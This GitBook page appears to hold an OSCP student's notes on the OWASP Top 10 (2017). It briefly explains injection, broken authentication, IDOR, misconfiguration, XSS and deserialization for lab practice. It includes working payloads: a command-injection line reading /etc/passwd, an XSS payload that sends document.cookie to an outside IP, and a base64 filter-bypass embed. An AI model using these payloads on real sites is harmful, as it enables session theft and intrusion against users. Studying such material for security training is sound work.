Offensive Security Notes
  • OSCP Checklist
    • Privilege Escalation Windows
  • Menu
    • Services
      • Remote Desktop (RDP) (3389)
      • FTP (21)
      • Telnet (23)
      • SMTP (25)
      • HTTP/HTTPS (80/443)
        • OWASP TOP 10 (2017)
      • Kerberos (88) / Active Directory (AD)
      • NetBIOS (139)
      • Samba / SMB (445)
      • IMAP (143/993)
      • MySQL / MariaDB (3389)
      • PostgreSQL (5432)
    • Vulnerability Methods
      • Padding Oracle Attack
      • Unsecure JSON Web Token (JWT)
      • XXE (XML External Entity)
      • LFI / RFI (Local / Remote File Inclusion)
      • CSRF (Cross-Site Request Forgery)
      • Session Fixation
      • SSRF (Server-Side Request Forgery)
      • Wildcard Injection
    • Tools of the Trade
      • powershell
      • hashcat
      • responder
      • OWASP Favicon DB
      • misc
      • meterpreter
      • Bloodhound
      • powerview
      • redis
      • wpscan
      • cewl
    • Walkthroughs
      • Try Hack Me
        • Attacktive Directory
      • OSCP Practice
        • Vector
        • Vault
        • QuarterJack
        • PayDay
        • Pelican
        • Postfish
        • Readys
Powered by GitBook
On this page
  • Injection
  • Command Injection
  • Wildcard Injection
  • Broken Authentication
  • Sensitive Data Exposure
  • XML External Entity
  • Broken Access Control
  • Security Misconfiguration
  • Cross-site Scripting (XSS)
  • Bypass XSS Filters
  • Insecure Deserialization
  • Components with Known Vulnerabilities
  • Insufficient Logging & Monitoring
  1. Menu
  2. Services
  3. HTTP/HTTPS (80/443)

OWASP TOP 10 (2017)

https://cheatsheetseries.owasp.org/IndexTopTen.html

PreviousHTTP/HTTPS (80/443)NextKerberos (88) / Active Directory (AD)

Last updated 3 years ago

Injection

Command Injection

Blind Injection does not provide command output

Active Injection provides a response to the user

Example: evilshell.php?commandString=cat /etc/passwd

Wildcard Injection

For example when an elevated program is calling for wildcard * you can abuse this by finding ways to complete a valid command for that program through the wildcard iterations. More info on this page specific to .

Broken Authentication

  • Brute Force Attacks

  • Weak Credentials

  • Weak Session Cookies

Sometimes you may even be able to re-register an existing account and getting their privileges by creating something with username " admin" (with space at beginning).

Sensitive Data Exposure

Having sensitive data such as usernames or passwords in HTML comments, or flat-file databases available to be downloaded in whole.

XML External Entity

Broken Access Control

IDOR (Insecure Direct Object Reference) is a common way to test for broken access control. In essence being able to change a parameter on the client side would provide you with data from a different user since the web app is not configured with correct access controls. 

note.php?note=1 for you
note.php?note=0 shows somebody else's note

Security Misconfiguration

  • Poorly configured permissions on cloud services, like S3 buckets

  • Having unnecessary features enabled, like services, pages, accounts or privileges

  • Default accounts with unchanged passwords (most common)

  • Error messages that are overly detailed and allow an attacker to find out more about the system

Cross-site Scripting (XSS)

  • Stored XSS - the most dangerous type of XSS. This is where a malicious string originates from the website’s database. This often happens when a website allows user input that is not sanitised (remove the "bad parts" of a users input) when inserted into the database.

    • <img src=x onerror="this.src='http://10.6.104.9/collect.gif?'+document.cookie; this.removeAttribute('onerror');">

    • <img src=x onerror=alert('XSS');>

  • Reflected XSS - the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.

    1. reflected?keyword=<script>alert(“Hello”)</script>

    2. reflected?keyword=<script>alert(window.location.hostname)</script>

  • DOM-Based XSS - DOM stands for Document Object Model and is a programming interface for HTML and XML documents. It represents the page so that programs can change the document structure, style and content. A web page is a document and this document can be either displayed in the browser window or as the HTML source.

    1. <script>document.getElementById("thm-title").textContent="I am able to change the title";</script>

    2. http://10.10.33.108/dom#img-url=test" onmouseover="alert(document.cookie)"

Bypass XSS Filters

<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>

Insecure Deserialization

Using user provided data without sanitizing properly (mostly). For example changing cookies that give you admin access, or changing cookies to give reverse shell access.

Components with Known Vulnerabilities

Vulnerable applications which are well-known and have ready-made exploits on places such as exploit-db.com

Insufficient Logging & Monitoring

Insecure managing of XML payloads can possibly give you Local File Inclusion (LFI). Example on the .

Not using , or revealing too much detail in the Server: HTTP header

wildcard injection
XXE page
HTTP security headers
https://github.com/ihebski/XSS-Payloads